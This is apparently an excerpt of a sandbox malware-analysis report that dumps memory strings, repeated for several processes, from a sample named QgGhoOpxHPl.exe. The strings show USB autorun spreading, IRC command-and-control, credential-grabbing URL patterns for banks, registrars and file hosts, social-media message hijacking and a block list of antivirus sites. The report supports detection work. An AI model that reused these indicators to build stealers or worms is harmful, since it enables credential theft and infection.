            Source: QgGhoOpxHPl.exe, 0000000C.00000002.621009440.0000000000410000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 0000000D.00000002.620504117.00000000001B0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000D.00000002.620504117.00000000001B0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000D.00000002.620504117.00000000001B0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL 
'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000D.00000002.620504117.00000000001B0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000000D.00000002.620504117.00000000001B0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 0000000E.00000002.620850418.0000000000350000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000E.00000002.620850418.0000000000350000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000E.00000002.620850418.0000000000350000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000E.00000002.620850418.0000000000350000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000000E.00000002.620850418.0000000000350000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 0000000F.00000002.620690942.0000000000310000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000F.00000002.620690942.0000000000310000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000F.00000002.620690942.0000000000310000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000F.00000002.620690942.0000000000310000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000000F.00000002.620690942.0000000000310000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 00000010.00000002.621074931.0000000000380000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000010.00000002.621074931.0000000000380000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000010.00000002.621074931.0000000000380000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000010.00000002.621074931.0000000000380000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000010.00000002.621074931.0000000000380000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 00000011.00000002.620453836.0000000000100000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000011.00000002.620453836.0000000000100000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000011.00000002.620453836.0000000000100000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 00000011.00000002.620453836.0000000000100000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 00000011.00000002.620453836.0000000000100000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exe, 00000012.00000002.620425856.0000000000100000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 00000012.00000002.620425856.0000000000100000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 00000012.00000002.620425856.0000000000100000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/